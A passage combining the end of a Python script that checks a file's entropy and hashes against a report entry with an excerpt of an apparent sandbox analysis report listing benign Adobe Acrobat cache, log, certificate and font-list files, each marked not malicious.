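            ok = got.upper() == str(want).upper()
        if not ok:
            mismatches.append(label)
    return mismatches


if __name__ == "__main__":
    # Constructed inputs (not files from the report): a repeated plain-text
    # line, and a byte-uniform blob standing in for encrypted or packed content.
    text_blob = b"2024/12/09-01:04:43.117 cd4 Reusing MANIFEST cache/MANIFEST-000001\n" * 4
    uniform_blob = bytes(range(256)) * 4
    for name, blob in (("text", text_blob), ("uniform", uniform_blob)):
        p = profile_bytes(blob)
        print(f"{name}: size={p.size} entropy={p.entropy:.4f} encrypted={p.encrypted} md5={p.md5}")
```

Run profile_file on the recovered file and hand the entry's values to compare_to_report; an empty list means the artefact on disk is the one the report describes. The entropies of roughly 5 bits per byte in the LevelDB LOG and JSON entries below are what plain text normally produces, whereas a packed executable or an encrypted payload sits close to 8.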
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):289
                                                Entropy (8bit):5.158849390404121
                                                Encrypted:false
                                                SSDEEP:6:juRcq2Pwkn2nKuAl9OmbnIFUt8WuRfXZmw+WuRfFkwOwkn2nKuAl9OmbjLJ:ju+vYfHAahFUt8WupX/+WupF5JfHAaSJ
                                                MD5:24820C395FDB62B7FA224ADFFF0CD1A1
                                                SHA1:B68ED3162860A4385EBCDBD94E13E0B6924E1748
                                                SHA-256:2A71D9DC773CEDD2C42500CF91DB73DBDCB27A56263B39A1BE4BFAE3DD33CB72
                                                SHA-512:2DDD89849084CDD2B60DB27988974C51E848D9605AE45F762A293A24A20362B665103D59C110358A4931877D30EE6C5DC13BB76868E01ECB12F836538C629E80
                                                Malicious:false
                                                Preview:2024/12/09-01:04:43.117 cd4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/09-01:04:43.119 cd4 Recovering log #3.2024/12/09-01:04:43.119 cd4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):289
                                                Entropy (8bit):5.158849390404121
                                                Encrypted:false
                                                SSDEEP:6:juRcq2Pwkn2nKuAl9OmbnIFUt8WuRfXZmw+WuRfFkwOwkn2nKuAl9OmbjLJ:ju+vYfHAahFUt8WupX/+WupF5JfHAaSJ
                                                MD5:24820C395FDB62B7FA224ADFFF0CD1A1
                                                SHA1:B68ED3162860A4385EBCDBD94E13E0B6924E1748
                                                SHA-256:2A71D9DC773CEDD2C42500CF91DB73DBDCB27A56263B39A1BE4BFAE3DD33CB72
                                                SHA-512:2DDD89849084CDD2B60DB27988974C51E848D9605AE45F762A293A24A20362B665103D59C110358A4931877D30EE6C5DC13BB76868E01ECB12F836538C629E80
                                                Malicious:false
                                                Preview:2024/12/09-01:04:43.117 cd4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/09-01:04:43.119 cd4 Recovering log #3.2024/12/09-01:04:43.119 cd4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):333
                                                Entropy (8bit):5.163052101733533
                                                Encrypted:false
                                                SSDEEP:6:ju+q2Pwkn2nKuAl9Ombzo2jMGIFUt8WuJKXZmw+WuZFzkwOwkn2nKuAl9Ombzo23:ju+vYfHAa8uFUt8WuJ6/+Wun5JfHAa8z
                                                MD5:47F56480CBC018B56B319005ADAF033A
                                                SHA1:E3B3620E073FB4EED636EADDE4B886998AB13277
                                                SHA-256:5542A9B8BE4C4733440F71CE7EB23029663685BC353B263A5F6A83A87FCFE453
                                                SHA-512:E1FAA0BCEB6D79E22393F526642E94CF63B597CC93DB0E1FFCD542F63622CFD1ED8F29A8F69EEF5E2CA7A01B21BCE3424AD170F03BB0FA1D2EB6AF6A0AF0E4E4
                                                Malicious:false
                                                Preview:2024/12/09-01:04:43.801 6c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/09-01:04:43.802 6c4 Recovering log #3.2024/12/09-01:04:43.803 6c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):333
                                                Entropy (8bit):5.163052101733533
                                                Encrypted:false
                                                SSDEEP:6:ju+q2Pwkn2nKuAl9Ombzo2jMGIFUt8WuJKXZmw+WuZFzkwOwkn2nKuAl9Ombzo23:ju+vYfHAa8uFUt8WuJ6/+Wun5JfHAa8z
                                                MD5:47F56480CBC018B56B319005ADAF033A
                                                SHA1:E3B3620E073FB4EED636EADDE4B886998AB13277
                                                SHA-256:5542A9B8BE4C4733440F71CE7EB23029663685BC353B263A5F6A83A87FCFE453
                                                SHA-512:E1FAA0BCEB6D79E22393F526642E94CF63B597CC93DB0E1FFCD542F63622CFD1ED8F29A8F69EEF5E2CA7A01B21BCE3424AD170F03BB0FA1D2EB6AF6A0AF0E4E4
                                                Malicious:false
                                                Preview:2024/12/09-01:04:43.801 6c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/09-01:04:43.802 6c4 Recovering log #3.2024/12/09-01:04:43.803 6c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):475
                                                Entropy (8bit):4.967403857886107
                                                Encrypted:false
                                                SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                MD5:B7761633048D74E3C02F61AD04E00147
                                                SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                Malicious:false
                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):475
                                                Entropy (8bit):4.967403857886107
                                                Encrypted:false
                                                SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                MD5:B7761633048D74E3C02F61AD04E00147
                                                SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                Malicious:false
                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:modified
                                                Size (bytes):546
                                                Entropy (8bit):4.949867576032391
                                                Encrypted:false
                                                SSDEEP:12:YHgLdvI1oqBWsB6um3RA8sqJ2gsBd2caq3QH7E4TX:YALtIPB7JsRdsZdJ3QH7n7
                                                MD5:624EA1F42B72404E6A5BD12EA495EA67
                                                SHA1:F3C694F276938BF5C9830C4C1F0616E3404BDAED
                                                SHA-256:217F03962EB39AB353704367748A38B1B15B84CF4A8DA17685D98F9A0F0130EA
                                                SHA-512:C316787F369603F9260930B30E159FB8ADC19F60C1ABE24C8C2182C685A93BC540131B48D4F9C108E7886424B4373E75FC16B972607AC76AE7B2A17F02333E0E
                                                Malicious:false
                                                Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":2,"broken_until":"1733724610","host":"chrome.cloudflare-dns.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378284312710911","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):475
                                                Entropy (8bit):4.967403857886107
                                                Encrypted:false
                                                SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                MD5:B7761633048D74E3C02F61AD04E00147
                                                SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                Malicious:false
                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4812
                                                Entropy (8bit):5.2607929979267825
                                                Encrypted:false
                                                SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo73c/c0YBjH:etJCV4FiN/jTN/2r8Mta02fEhgO73gov
                                                MD5:9E3947FA773E7A3D28AC26D823AC3597
                                                SHA1:BAC1FC7A5EAA23612FAF7DD13F2EA1544BBF1E3B
                                                SHA-256:01D2E2DCCF62A7EDD280D48C64749356D14D80F55CBDAE7581563F96D0F637D6
                                                SHA-512:D294A46BE16786E191B2C32F36FE2AAF4C6341518DB7157647650D33849925D2E5A81B4403EA0E1BA8F58F2A07A1F34386AF4B53347F119AF14D2D10BFFB1E49
                                                Malicious:false
                                                Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):321
                                                Entropy (8bit):5.151007476450527
                                                Encrypted:false
                                                SSDEEP:6:jOQeIq2Pwkn2nKuAl9OmbzNMxIFUt8WOKJZmw+WEGkwOwkn2nKuAl9OmbzNMFLJ:jNXvYfHAa8jFUt8WT/+WEG5JfHAa84J
                                                MD5:B9BF243A6C1458C4C0DDF30471ED1AC9
                                                SHA1:0734065638611C7E6E21115B17E9C7313F008926
                                                SHA-256:7EC7FD71BAC83B6EF1373FD4AFB7E3D7660E5468CB1F82A770E0AAD2DB08CDA9
                                                SHA-512:97C177F28AEAA1E058CB23557244FC60A4A3E0119B0124DE10247E8398AFD870DD732A7DE1126EB9459E78E7143A60CDD077F21695622A5DD8722646C3BB6250
                                                Malicious:false
                                                Preview:2024/12/09-01:04:44.295 6c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/09-01:04:44.296 6c4 Recovering log #3.2024/12/09-01:04:44.300 6c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):321
                                                Entropy (8bit):5.151007476450527
                                                Encrypted:false
                                                SSDEEP:6:jOQeIq2Pwkn2nKuAl9OmbzNMxIFUt8WOKJZmw+WEGkwOwkn2nKuAl9OmbzNMFLJ:jNXvYfHAa8jFUt8WT/+WEG5JfHAa84J
                                                MD5:B9BF243A6C1458C4C0DDF30471ED1AC9
                                                SHA1:0734065638611C7E6E21115B17E9C7313F008926
                                                SHA-256:7EC7FD71BAC83B6EF1373FD4AFB7E3D7660E5468CB1F82A770E0AAD2DB08CDA9
                                                SHA-512:97C177F28AEAA1E058CB23557244FC60A4A3E0119B0124DE10247E8398AFD870DD732A7DE1126EB9459E78E7143A60CDD077F21695622A5DD8722646C3BB6250
                                                Malicious:false
                                                Preview:2024/12/09-01:04:44.295 6c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/09-01:04:44.296 6c4 Recovering log #3.2024/12/09-01:04:44.300 6c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                Category:dropped
                                                Size (bytes):86016
                                                Entropy (8bit):4.444630649917991
                                                Encrypted:false
                                                SSDEEP:384:yezci5t7iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r4s3OazzU89UTTgUL
                                                MD5:D29FC24683F57AEE770CCC10BBE10145
                                                SHA1:FD39A81AEAF28A09C451AC4B5DAA737961E91208
                                                SHA-256:3CF860E12D12737619F91078019729DBE643094EFC1C76C287637B72D7FDEE23
                                                SHA-512:5C50ACDC4AB8FCB20D322E987048FDC66DE90CD62EDDDE804B31F3CEA12A41D9DDDC3E741EB825417049DAF76B03E5B7B3396206A61DFC62D3B237B0EBC1BC02
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite Rollback Journal
                                                Category:dropped
                                                Size (bytes):8720
                                                Entropy (8bit):3.770470275674103
                                                Encrypted:false
                                                SSDEEP:48:7MRsUpA2ioyVTioyloWoy1Cwoy1PKOioy1noy1AYoy1Wioy11ioyeioyBoy1noyW:78sUpfuTR2X2jicb9IVXEBodRBkp
                                                MD5:4BBD2CB0C97061FDC4AF0E5D8547744F
                                                SHA1:AE0A149F226CF332DC0D6968BA7D09D7B2C1B008
                                                SHA-256:5AC1C3F4B933A564ABE687CDD0883083AE75CA292D47D4AA3E2154470A54BE34
                                                SHA-512:91B204B0FCBAF1D4FE0C66BFC3C68AF6AB3808293023AE93D8CE7F7B4BC9CA469D15A0D2073BC287F462558B289631D94AC57AC44310FEB9C0A52302375F9F3C
                                                Malicious:false
                                                Preview:.... .c......5L................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:Certificate, Version=3
                                                Category:dropped
                                                Size (bytes):1391
                                                Entropy (8bit):7.705940075877404
                                                Encrypted:false
                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                Malicious:false
                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):192
                                                Entropy (8bit):2.7130774337030337
                                                Encrypted:false
                                                SSDEEP:3:kkFkl5Vwlv+stfllXlE/HT8ku77l1NNX8RolJuRdxLlGB9lQRYwpDdt:kKDlLeT8/l7NMa8RdWBwRd
                                                MD5:4A6053066C7A84833BB925BCF001D2EC
                                                SHA1:3678320A5C9A09780B73446523B59BC42363B421
                                                SHA-256:0D13E7ABE62371CC91A3DA757A89AA7744A913F615AB51E69076D79146480750
                                                SHA-512:10A8F610DA4B8157A150BAC77728A52E9013385E14609781D3060749817DF55090509C92AAEB2C326ED9C87016F0E924590245CBFBDD0627D9DC327F2240589C
                                                Malicious:false
                                                Preview:p...... ........J..M.J..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):1233
                                                Entropy (8bit):5.233980037532449
                                                Encrypted:false
                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):1233
                                                Entropy (8bit):5.233980037532449
                                                Encrypted:false
                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):1233
                                                Entropy (8bit):5.233980037532449
                                                Encrypted:false
                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):10880
                                                Entropy (8bit):5.214360287289079
                                                Encrypted:false
                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4
                                                Entropy (8bit):0.8112781244591328
                                                Encrypted:false
                                                SSDEEP:3:e:e
                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                Malicious:false
                                                Preview:....
